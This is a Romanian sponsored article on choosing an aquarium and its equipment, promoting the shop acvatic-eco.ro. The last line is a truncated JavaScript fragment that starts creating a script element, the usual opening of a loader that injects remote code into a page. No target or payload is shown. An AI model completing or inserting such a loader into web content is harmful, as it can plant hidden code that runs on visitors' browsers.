Cum alegi acvarii pesti

Cum alegi acvarii pestiSe stie ca animalele de companie isi lasa o amprenta pozitiva in cresterea si educarea unui copil, acesta din urma gasindu-si un prieten necuvantator de incredere care-l va ajuta sa devina mai responsabil, sa-si dea drumul la vorba, sa devina mai sociabil si mai comunicativ. Si cum tot mai multi oameni locuiesc la bloc si le lipseste si timpul, dar si spatiul pentru alt gen de animale de companie, pestii sunt o alegere potrivita. Cumpara si acvarii pesti potrivite si toata lumea va fi fericita!

Ghid practic alegere acvarii pesti

 

Atunci cand vrei sa cumperi acvarii pesti trebuie sa iei in considerare urmatoarele aspecte deosebit de importante:

1. Tipul de pesti pe care doresti sa-i cresti impreuna cu copiii tai. In functie de pestii pe care ai pus ochii – pesti de apa sarata, pesti de apa dulce sau pesti de apa calda – iti vei alege si acvariul necesar. Daca-ti plac pestii tropicali, deoarece sunt mai colorati si mai frumosi, trebuie sa tii cont ca acestia au nevoie in mod obligatoriu de apa calda. Deci, acvariul tau va trebui prevazut cu o sursa de incalzire a apei. In functie de pestii pe care-i vei cumpara, si acvarii pesti vor avea nevoi diferite si accesorii diferite.

2. Rezervorul. Incepatorii se pot multumi cu un rezervor mai mic. 10 litri sunt suficienti.

3. Incalzirea acvariului. Daca iubesti pestii tropicali acestia au nevoie de apa calda, deci acvariul tau trebuie dotat si cu incalzire.

4. Filtrul pentru acvariu. Filtrele sunt necesare. Acestea curata apa si permit ca pestii tai sa fie sanatosi si sa te bucuri de prezenta lor pentru cat mai mult timp.

5. Pompa. Permite ca pestii sa respire in voie si este cruciala pentru dotarea unui acvariu cu pesti.

6. Pietrisul si rocile din interiorul acvariului. Asigura un aspect cat mai realist, iar pestii vor iubi acest decor. Asigura-te ca pietrele sunt curate.

7. Iluminatul. Este nevoie de iluminat permanent, insa nu strident.

8. Kitul pentu testarea apei. Masoara in permanenta PH-ul din interiorul unui acvariu. Este o etapa importanta ce te va ajuta sa ai pesti sanatosi.

Acvarii pesti gasesti de cumparat si online, pe acvatic-eco.ro

 

Cum ziceam, timpul este cel mai mare dusman al nostru, insa daca i-ai promis copilului tau ca-i vei cumpara pesti, trebuie sa te tii de cuvant! Nu uita si de acvarii pesti si de toate Cum alegi acvarii pestiaccesoriile necesare, de hrana si de medicamente, si viata alaturi de pesti poate debuta cu voie buna.

De unde poti cumpara acvarii pesti potrivite si toate cele necesare cresterii acestora? De la Acvatic Ecosistem prin intermediul magazinului sau online, acvatic-eco.ro. Care este oferta Acvatic Ecosistem in materie de acvarii pesti? Gasesti 2 mari categorii:

1. Acvarii pesti din sticla;

2. Acvarii pesti din plastic.

In functie de pestii alesi poti sa alegi si acvariul potrivit. Acvatic Ecosistem iti ofera varietate, estetica si preturi atragatoare. Gasesti acvarii pesti la dimensiuni mai mici sau mai mari, in functie de necesitatile tale, acvarii pesti in forma dreptunghiulara sau acvarii pesti sub forma de bol de sticla pentru un aspect estetic deosebit.

Tot de pe acvatic-eco.ro poti gasi si numeroase ornamente pentru pesti, accesorii pentru acvarii pesti, hrana, tratamente apa sau fertilizatori.

Daca vrei sa ai parte de calitate, alege acvarii pesti de la Acvatic Ecosistem. Ai nevoie de informatii suplimentare despre magazinul si produsele Acvatic Ecosistem? Pentru detalii si comenzi, suna la numarul 0745-777.793 sau trimite un e-mail pe adresa contact@acvatic-eco.ro.

Articol oferit de zoom-biz.ro.

var d=document;var s=d.createElement(‘script’);